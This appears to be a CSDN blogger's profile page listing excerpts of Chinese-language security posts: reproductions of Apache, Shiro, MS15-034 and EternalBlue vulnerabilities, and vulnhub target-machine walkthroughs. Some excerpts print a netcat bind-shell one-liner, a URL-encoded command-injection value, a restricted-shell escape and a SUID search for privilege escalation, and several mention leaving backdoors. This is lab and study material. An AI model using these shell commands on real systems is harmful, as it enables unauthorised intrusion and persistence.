源十三
码龄2年
  • 34,679
    被访问
  • 60
    原创
  • 86,689
    排名
  • 194
    粉丝
关注
提问 私信

个人简介:人海争渡,各有归途

  • 加入CSDN时间: 2020-04-23
博客简介:

weixin_47306547的博客

查看详细资料
  • 3
    领奖
    总分 431 当月 13
个人成就
  • 获得31次点赞
  • 内容获得8次评论
  • 获得167次收藏
创作历程
  • 4篇
    2022年
  • 57篇
    2021年
成就勋章
  • 最近
  • 文章
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

常见 Web 中间件及其漏洞概述(二):Apache

Apache 简介Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。解析漏洞未知扩展名解析漏洞原理Apache的解析漏洞依赖于一个特性: Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别(不在默认一个文件可以有多个以点分割的后缀,当最右边...
原创
发布博客 2022.01.03 ·
305 阅读 ·
0 点赞 ·
0 评论

漏洞复现(五):Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

漏洞原理Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。漏洞复现环境搭建cd vulhub/shiro/CVE-2016-4437/docker-compose up -d漏洞利用工具:https://github.com/feihong-cs/ShiroExploit/relea.
原创
发布博客 2022.01.03 ·
2664 阅读 ·
0 点赞 ·
0 评论

漏洞复现(四):CVE-2021-42013

目录漏洞原理影响版本漏洞复现环境搭建漏洞利用漏洞修复漏洞原理Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。影响版本Apache 2.4.49 和 Apache 2.4.5..
原创
发布博客 2022.01.03 ·
211 阅读 ·
0 点赞 ·
0 评论

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

目录漏洞简介漏洞复现一. Vulnerable file read config(易受攻击的文件读取配置)环境搭建漏洞利用二、VulnerableRCEconfig(易受攻击的RCE配置)环境搭建漏洞利用漏洞修复漏洞简介该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory />Require all granted</Directory> 允许被访问的的...
原创
发布博客 2022.01.03 ·
114 阅读 ·
0 点赞 ·
0 评论

常见 Web 中间件及其漏洞概述(一):IIS

IISPUT漏洞IIS Server 在 Web 服务扩展中开启了 WebDAV之后,支持多种请求,配合写入权限,可造成任意文件写入。短文件名猜解远程代码执行解析漏洞
原创
发布博客 2021.11.20 ·
3590 阅读 ·
1 点赞 ·
1 评论

解决 IIS 无法解析 PHP 文件

环境:Win 7 + IIS 7.0https://windows.php.net/downloads/releases/archives/
原创
发布博客 2021.11.20 ·
2724 阅读 ·
2 点赞 ·
1 评论

漏洞复现(二):HTTP.SYS远程代码执行漏洞(MS15-034)

漏洞介绍漏洞编号:CVE-2015-1635(MS15-034 )远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。影响范围Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2漏
原创
发布博客 2021.11.20 ·
4374 阅读 ·
0 点赞 ·
0 评论

靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用

目录环境主机发现端口扫描漏洞挖掘GetShell法一法二法三提权chkrootkit 漏洞提权法一法二法三防火墙规则清痕迹,留后门环境链接:https://pan.baidu.com/s/1OI1bYsnS_LBvMIrQCt1yuw提取码:lish主机发现端口扫描漏洞挖掘查看网页支持的访问方式:nmap --script=http-methods --...
原创
发布博客 2021.11.09 ·
1151 阅读 ·
0 点赞 ·
0 评论

漏洞复现(一):永恒之蓝(ms17-010)

目录永恒之蓝简介SMB协议SMB原理漏洞原理漏洞危害漏洞复现实验环境完整过程扫描目标主机是否存在该漏洞实施攻击漏洞利用漏洞防御永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
原创
发布博客 2021.11.02 ·
2676 阅读 ·
12 点赞 ·
0 评论

靶机记录(十二):evilscience

目录主机发现端口扫描SSH尝试连接Web渗透漏洞挖掘GetShell法一法二(MSF)提权法一(失败了)法二(脏牛,也失败了。。)​​​法三法四法五flag清痕迹,留后门主机发现端口扫描SSH尝试连接Web渗透漏洞挖掘试试其他的路径 :/var/log/apache2/access.log/var/log/apache/access.log -----WE...
原创
发布博客 2021.10.30 ·
35 阅读 ·
0 点赞 ·
0 评论

靶机记录(十一):DC-3

目录主机发现端口扫描Web渗透可能有用的页面漏洞挖掘CMS利用GetShell法1法2法3:大马提权法1(失败了)法2清痕迹,留后门主机发现端口扫描Web渗透可能有用的页面漏洞挖掘CMS利用用 joomscan 获取 CMS 具体版本GetShell法1mkfifo /tmp/tcat /tmp/t | /bin/sh -i 2>&a...
原创
发布博客 2021.10.30 ·
20 阅读 ·
0 点赞 ·
0 评论

靶机记录(十):DC-2

目录主机发现端口扫描Web渗透地址解析漏洞挖掘GetShell提权清痕迹,留后门主机发现端口扫描Web渗透地址解析漏洞挖掘太慢了九头蛇跑出来了一个Wpscan跑出来两个GetShell或者BASH_CMDS[a]=/bin/sh;a然后 /bin/bash添加并使用环境变量命令1:export PATH=$PATH:/bin/...
原创
发布博客 2021.10.29 ·
24 阅读 ·
0 点赞 ·
0 评论

靶机记录(九):DC-1

目录主机发现端口扫描SSH尝试连接Web渗透漏洞挖掘GetShell提权清痕迹,留后门主机发现端口扫描SSH尝试连接Web渗透漏洞挖掘GetShell提权换路子查看 Drupal 7 漏洞使用find命令查找有特殊权限suid的命令find / -perm -u=s -type f 2>/dev/null | ...
原创
发布博客 2021.10.29 ·
18 阅读 ·
0 点赞 ·
0 评论

靶机记录(八):VM-peixun-server

目录主机发现端口扫描SSH尝试连接Web渗透目录扫描GetShell提权清痕迹,留后门主机发现端口扫描SSH尝试连接Web渗透目录扫描会员登录没啥卵用GetShellmkfifo /tmp/tcat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t提权这个失败了脏牛提权链接:...
原创
发布博客 2021.10.29 ·
48 阅读 ·
0 点赞 ·
0 评论

靶机记录(七):zico2

目录主机发现端口扫描Web渗透目录扫描漏洞挖掘GetShell脏牛提权脏牛脚本:脏牛提权原理:清痕迹,留后门主机发现端口扫描Web渗透目录扫描漏洞挖掘GetShell脏牛提权脏牛脚本:链接:https://pan.baidu.com/s/1fPviMkyWJIATIctCDaPoBg提取码:lish脏牛提权原理:破坏Linux内核,替换第一行的roo...
原创
发布博客 2021.10.29 ·
18 阅读 ·
0 点赞 ·
0 评论

靶机记录(六):Lazysysadmin

目录主机发现端口扫描SSH尝试连接(GetShell-1)Web渗透目录扫描漏洞挖掘用户名枚举共享服务GetShell提权清痕迹,留后门主机发现端口扫描或(信息量大的时候不建议)SSH尝试连接(GetShell-1)Web渗透目录扫描存在目录遍历漏洞,但是没啥卵用漏洞挖掘综上:此处可以采用 用户名枚举 来破解出可能的用户名,再...
原创
发布博客 2021.10.29 ·
1195 阅读 ·
0 点赞 ·
0 评论

靶机记录(五):g0rmint

目录主机发现端口扫描FTPWeb渗透目录扫描漏洞挖掘GetShell提权清痕迹,留后门主机发现端口扫描FTPWeb渗透目录扫描漏洞挖掘代码分析从重置密码入手看之前写入的一句话木马(登录状态下)GetShell依次执行:HACK=`mkfifo /tmp/t`;HACK=%60mkfifo%20%2ftmp%2ft%60%3B HACK=`cat...
原创
发布博客 2021.10.29 ·
27 阅读 ·
0 点赞 ·
0 评论

靶机记录(四):Bulldog2

主机发现端口扫描Web渗透目录扫描漏洞挖掘一般情况下,如果没有发现什么可利用的目录,就可以尝试查看js页面,一般会有突破口JWT(Json Web Token)的声明,一般用于身份提供者和服务提供者间,来传递被认证的用户身份信息,以便从资源服务器获取资源,也可以增加一些额外的其他业务逻辑所必须的声明信息,该token也可直接被用于认证或被加密;JWT加解密网址:https://jwt.io/注册时格式错...
原创
发布博客 2021.10.29 ·
37 阅读 ·
0 点赞 ·
0 评论

靶机记录(三):bulldog

目主机发现端口扫描SSH 尝试连接Web渗透指纹识别目录扫描漏洞挖掘GetShell提权清痕迹,留后门主机发现端口扫描SSH 尝试连接由于字典的原因,没有破解出来 -> 尝试从扫描到的其他服务入手Web渗透指纹识别目录扫描漏洞挖掘若能够获取到网站使用的框架信息,可以直接针对框架查找漏洞GetShell...
原创
发布博客 2021.10.29 ·
27 阅读 ·
0 点赞 ·
0 评论

靶机记录(二):Billu_b0x

目录主机发现端口扫描尝试 SSH 连接Web渗透目录扫描漏洞挖掘GetShell提权清痕迹,留后门主机发现端口扫描若目标主机信息量小的话,可以用下面的代替上面两步尝试 SSH 连接意外连接成功且是 root 权限Web渗透目录扫描可能有用的页面漏洞挖掘GetShell提权清痕迹,留后门...
原创
发布博客 2021.10.29 ·
28 阅读 ·
0 点赞 ·
0 评论
加载更多